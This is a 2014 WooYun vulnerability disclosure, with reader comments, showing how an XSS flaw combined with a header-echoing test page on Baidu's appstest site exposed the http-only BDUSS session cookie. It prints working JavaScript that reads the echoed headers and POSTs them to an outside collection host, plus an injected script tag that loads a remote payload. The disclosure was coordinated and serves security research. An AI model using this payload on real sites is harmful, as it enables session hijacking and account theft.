当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051705

漏洞标题:我是如何通过XSS窃取到百度受http-only保护的cookie的

相关厂商:百度

漏洞作者: 超威蓝猫

提交时间:2014-02-22 18:15

修复时间:2014-04-08 18:15

公开时间:2014-04-08 18:15

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-22: 细节已通知厂商并且等待厂商处理中
2014-02-22: 厂商已经确认,细节仅向厂商公开
2014-03-04: 细节向核心白帽子及相关领域专家公开
2014-03-14: 细节向普通白帽子公开
2014-03-24: 细节向实习白帽子公开
2014-04-08: 细节向公众公开

简要描述:

BDUSS受http-only保护? 看我如何窃取到完整的cookie。

详细说明:

问题出在一个小漏洞上。

http://appstest.baidu.com/

百度移动客户端测试资源平台对外。上周提交到乌云的漏洞可能是因为审核员比较忙没有审核,这周我们来深挖一下。

01.jpg


http://appstest.baidu.com/http/echoheader.php

该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。

02.jpg


这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:

var u = 'http://buv.me/index.php?do=api&id={projectId}';
var cr;
if (document.charset) {
    cr = document.charset
} else if (document.characterSet) {
    cr = document.characterSet
};
function createXmlHttp() {
    if (window.XMLHttpRequest) {
        xmlHttp = new XMLHttpRequest()
    } else {
        var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
        for (var n = 0; n < MSXML.length; n++) {
            try {
                xmlHttp = new ActiveXObject(MSXML[n]);
                break
            } catch(e) {}
        }
    }
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "http://appstest.baidu.com/http/echoheader.php", true);
xmlHttp.send(null); 	
function postSource(cc) {
    createXmlHttp();
    url = u;
    cc = "mycode=" + cc;
    xmlHttp.open("POST", url, true);
    xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlHttp.setRequestHeader("Content-length", cc.length);
    xmlHttp.setRequestHeader("Connection", "close");
    xmlHttp.send(cc)
}
function writeSource() {
    if (xmlHttp.readyState == 4) {
        var c = new postSource(xmlHttp.responseText)
    }
}


由于是用xmlHttpRequest的形式读源码,且 http://appstest.baidu.com/ 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 http://wooyun.org/bugs/wooyun-2014-051026/trace/e80c9b4ecb9c252d6bdfdb21c335164d 中有提到, http://appstest.baidu.com/abnormalTest/abnormaTest.php?typeName=single 可以自由构造XSS。我们向该页面写入如下代码:

<title>wooyun.org</title>
<p>超威蓝猫@wooyun.org</p>
<script src=http://00f.me/XbSWCk></script>


成功窃取到包含BDUSS的完整cookie:

03.jpg


XSS收信平台收到了cookie:

04.jpg


最终的利用地址:
http://appstest.baidu.com/abnormalTest/abnormaTest.php?typeName=single

漏洞证明:

如上。

修复方案:

最关键的一点:测试用的后台不要对外。
另外 求份礼物(不要再发加湿器了..

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-02-22 19:14

厂商回复:

感谢提交,我们立即联系业务部门处理此问题。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-02-22 18:16 | ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子,但是除了他华...)

    我是如何回复这个帖子的...

  2. 2014-02-22 18:17 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    羞愧难当

  3. 2014-02-22 18:18 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @xsser 之前我15号提交的那个漏洞还是不要通过审核吧,和这个一样..

  4. 2014-02-22 19:06 | Ricter ( 实习白帽子 | Rank:59 漏洞数:15 | 渣渣一个)

    大神!!

  5. 2014-02-22 19:25 | dtc ( 路人 | Rank:10 漏洞数:1 | 业余技术爱好者,来乌云学习。)

    度娘的bduss漏洞百出。。httponly形同虚设

  6. 2014-02-22 19:26 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @dtc 屌!= =

  7. 2014-02-22 22:06 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    这么说我的端口又得换了?

  8. 2014-02-22 22:07 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @retaker 这位retaker是当年点艹猴子团小擦的retaker吗

  9. 2014-02-22 23:11 | retaker ( 路人 | Rank:1 漏洞数:1 | free open share)

    @超威蓝猫 - =小擦是谁?我只是在百度贴吧蠕过3次而已……

  10. 2014-02-23 11:26 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    碉堡

  11. 2014-03-18 01:06 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    洞主得多少加湿器了

  12. 2014-04-08 20:38 | 奔跑的蜗牛 ( 路人 | Rank:0 漏洞数:1 | 要想看好风景得上高处!成为一名优秀的白帽...)

    小菜有问题想请教楼主,在IE下,xmlhttprequest发送数据不成功怎么回事,创建xmlhttprequest对象和你的一样啊!!我用的的post方式发送,但是始终得不到数据。。。。。

  13. 2014-04-08 20:55 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @奔跑的蜗牛 不清楚..

  14. 2014-04-08 21:14 | 奔跑的蜗牛 ( 路人 | Rank:0 漏洞数:1 | 要想看好风景得上高处!成为一名优秀的白帽...)

    @超威蓝猫 你的上面这段代码,ie测试下可以么??难道是我的环境哪里限制了??这几天都在折腾这问题,蛋疼啊!!

  15. 2014-04-09 09:06 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)

    ╮(╯_╰)╭所以说这页面是怎么找到的..

  16. 2014-04-09 10:13 | w5r2 ( 普通白帽子 | Rank:226 漏洞数:52 )

    @奔跑的蜗牛 用google浏览器

  17. 2014-04-09 10:15 | 奔跑的蜗牛 ( 路人 | Rank:0 漏洞数:1 | 要想看好风景得上高处!成为一名优秀的白帽...)

    @w5r2 在谷歌浏览器和火狐都可以发送成功,但是就是在ie下不行,我在创建xmlhttprequest对象时,有判断是否创建成功,理论上ie下的对象是有创建的,但是就是发送不成功!!

  18. 2014-04-09 10:40 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)

    @奔跑的蜗牛 setRequestHeader写了么?

  19. 2014-04-09 10:58 | 奔跑的蜗牛 ( 路人 | Rank:0 漏洞数:1 | 要想看好风景得上高处!成为一名优秀的白帽...)

    @QQ852451559 额,写了就跟lz那个postSource函数里头的设置一致

  20. 2014-04-09 11:02 | lupin ( 普通白帽子 | Rank:254 漏洞数:48 | 尊重自己的爱好 远离利益的罪恶)

    学习了 很好的思路

  21. 2014-08-15 15:25 | latershow ( 路人 | Rank:24 漏洞数:6 | andr0day)

    学习了

  22. 2015-04-26 15:37 | 昌维 ( 路人 | Rank:2 漏洞数:3 | QQ:867597730,百度贴吧ID:昌维001)

    洞主加湿器不要就给我吧